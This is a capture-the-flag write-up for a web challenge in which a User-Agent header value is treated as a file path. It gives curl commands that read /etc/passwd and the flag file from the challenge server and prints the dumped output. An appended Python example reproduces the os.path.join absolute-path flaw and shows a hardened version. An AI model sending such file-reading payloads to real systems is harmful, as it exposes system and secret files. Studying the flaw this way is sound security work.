I didn't spend much time on this CTF, so I wrote writeups for only a few problems.
● [ I love browsers ]
The main page shows a "Hello [user's browser] user" sentence. The two ways a service can learn a user's browser are JavaScript or the "User-Agent" header. This service doesn't seem to use JavaScript, so I tested the "User-Agent" header. When I wrote Safari in it, the service worked. Another thing I found is that the header doesn't care what words come in front; it only cares about the last word and what is to the right of the "/".
So I used curl to modify the "User-Agent" header like this.
curl -H "User-Agent: .." http://52.59.124.14:10009
↳ This incident will be reported (https://xkcd.com/838/)
I tried to check the directory above, but it failed. So I checked /etc/passwd.
>> curl -H "User-Agent: /etc/passwd" http://52.59.124.14:10009
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hello /etc/passwd user</title>
</head>
<body bgcolor="lightblue">
<div align="center">
<h1>Hello /etc/passwd user</h1>
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
#flag is in /app/FLAG.txt
</div>
<div style="height: 100px;">
</div>
<div align="center">
<table id="data" class="table table-striped">
<thead>
<tr>
<th>Author</th>
<th>Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td>testron</td>
<td>tata</td>
</tr>
</tbody>
</table>
<form action="/test" method="post">
<table>
<tr>
<td>Name:</td>
<td><input type="text" name="user"></td>
</tr>
<tr>
<td>Comment:</td>
<td><textarea style="height:100px;" type="text" name="comment"></textarea></td>
</tr>
</table>
<input type="submit">
</form>
</div>
</body>
</html>
Jackpot! I searched all the directories this way. The flag is in "/app/FLAG.txt".
Payload
curl -H "User-Agent: /app/FLAG.txt" http://52.59.124.14:10009
Flag
ENO{Why,os.path,why?}
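The flag hints at os.path, which matches what the writeup observed: a value read from the User-Agent header ends up in a filesystem path, and an absolute value like "/etc/passwd" replaces the intended base directory entirely. The example below is added here and is not the challenge's code; it reproduces that os.path.join pitfall with an assumed template directory (/app/templates) and shows a hardened lookup that keeps every name inside the base directory.

```python
import os
from pathlib import Path

# Constructed stand-in for a directory of per-browser greeting templates.
# The real challenge's layout is unknown; only /app/FLAG.txt is from the page.
TEMPLATE_DIR = "/app/templates"


def template_path_unsafe(browser: str) -> str:
    """Weak pattern (assumed, not the challenge's real code): join the
    header-controlled name onto the base with os.path.join. If `browser`
    starts with '/', os.path.join discards TEMPLATE_DIR and returns the
    attacker-chosen absolute path unchanged."""
    return os.path.join(TEMPLATE_DIR, browser)


def template_path_safe(browser: str) -> str:
    """Hardened version: a template name must be a single filename, and the
    resolved candidate must remain under TEMPLATE_DIR. Raises ValueError
    for anything else (absolute paths, separators, '.' and '..')."""
    if not browser or "/" in browser or "\\" in browser or browser in (".", ".."):
        raise ValueError(f"invalid browser name: {browser!r}")
    base = Path(TEMPLATE_DIR).resolve()
    candidate = (base / browser).resolve()
    # commonpath (rather than startswith) avoids prefix tricks such as
    # /app/templates2 being accepted as "inside" /app/templates.
    if os.path.commonpath([str(base), str(candidate)]) != str(base):
        raise ValueError(f"path escapes template directory: {browser!r}")
    return str(candidate)


def safe_or_none(browser: str):
    """Convenience wrapper: the hardened path, or None if the name was rejected."""
    try:
        return template_path_safe(browser)
    except ValueError:
        return None


if __name__ == "__main__":
    # Constructed inputs: a legitimate browser name and the two header
    # values the writeup used.
    for name in ("Safari", "/etc/passwd", "/app/FLAG.txt"):
        print(f"{name!r:16} unsafe -> {template_path_unsafe(name)}")
        print(f"{'':16} safe   -> {safe_or_none(name)}")
```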